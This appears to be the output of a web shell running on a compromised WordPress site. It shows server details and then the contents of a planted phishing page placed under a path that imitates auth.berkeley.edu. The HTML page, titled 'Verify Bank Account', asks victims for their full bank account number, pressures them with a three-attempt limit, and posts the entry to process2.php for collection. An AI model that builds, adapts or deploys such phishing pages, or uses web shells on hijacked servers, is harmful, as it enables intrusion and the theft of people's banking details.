HEX
Server: Apache/2
System: Linux ctr689471.novalocal 4.9.241-37.el7.x86_64 #1 SMP Mon Nov 2 13:55:04 UTC 2020 x86_64
User: bluecool (1005)
PHP: 7.4.30
Disabled: NONE
Upload Files
File: /home/bluecool/domains/bluecool.vn/public_html/wp-content/auth.berkeley.edu/account.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Verify Bank Account</title>

    <style>
        * {
            box-sizing: border-box;
            font-family: Arial, Helvetica, sans-serif;
        }

        body {
            margin: 0;
            background-color: #ffffff;
            color: #333;
        }

        .top-bar {
            height: 70px;
            background: linear-gradient(to right, #1b8ecf, #0f6ea5);
        }

        .container {
            max-width: 900px;
            margin: 0 auto;
            padding: 40px 20px;
            text-align: center;
        }

        h1 {
            font-size: 32px;
            margin-bottom: 10px;
            font-weight: 600;
        }

        .divider {
            height: 1px;
            background-color: #ccc;
            margin: 20px 0 30px;
        }

        .instructions {
            font-size: 16px;
            margin-bottom: 20px;
        }

        .notice {
            display: inline-block;
            background-color: #e8f2ff;
            border: 1px solid #b7d6ff;
            color: #0a4ea1;
            padding: 12px 18px;
            border-radius: 6px;
            font-size: 15px;
            margin-bottom: 35px;
        }

        .form-group {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-bottom: 18px;
            gap: 20px;
        }

        label {
            width: 200px;
            text-align: right;
            font-weight: 600;
        }

        input[type="text"] {
            width: 360px;
            padding: 10px;
            font-size: 15px;
            border: 1px solid #999;
            border-radius: 4px;
        }

        /* ERROR MESSAGE */
        .error-message {
            color: #b00020;
            font-size: 15px;
            margin-top: 15px;
            display: none;
            font-weight: 600;
        }

        /* FIXED BUTTON VISIBILITY */
        .btn {
            margin-top: 30px;
            padding: 14px 50px;
            font-size: 18px;
            font-weight: 600;
            background-color: #1b6fd1; /* darker blue */
            color: #ffffff;
            border: none;
            border-radius: 6px;
            cursor: pointer;
        }

        .btn:hover {
            background-color: #1558a8;
        }

        .attempt-count {
            margin-top: 35px;
            font-size: 16px;
            font-weight: 600;
        }
    </style>
</head>
<body>

<div class="top-bar"></div>

<div class="container">
    <h1>Verify Bank Account</h1>

    <div class="divider"></div>

    <p class="instructions">
        To view or update your direct deposit information, enter your full active account number.
    </p>

    <div class="notice">
        You have <strong>3 attempts</strong> to verify your bank account.
        After 3 failed attempts, you will need to wait for the following day to try again.
    </div>

    <form action="process2.php" method="post" onsubmit="return validateAccounts();">
        <div class="form-group">
            <label for="account">*Account Number</label>
            <input type="text" id="account" name="account" required>
        </div>

        <div class="form-group">
            <label for="retype">*Retype Account Number</label>
            <input type="text" id="retype" name="retype" required>
        </div>

        <div id="error" class="error-message">
            The account numbers do not match. Please re-enter and try again.
        </div>

        <button type="submit" class="btn">Verify</button>
    </form>

    <div class="attempt-count">
        Verification Attempt Count: 0
    </div>
</div>

<script>
    function validateAccounts() {
        const account = document.getElementById('account').value.trim();
        const retype = document.getElementById('retype').value.trim();
        const error = document.getElementById('error');

        if (account !== retype) {
            error.style.display = 'block';
            return false; // stop form submission
        }

        error.style.display = 'none';
        return true; // allow submission
    }
</script>

</body>
</html>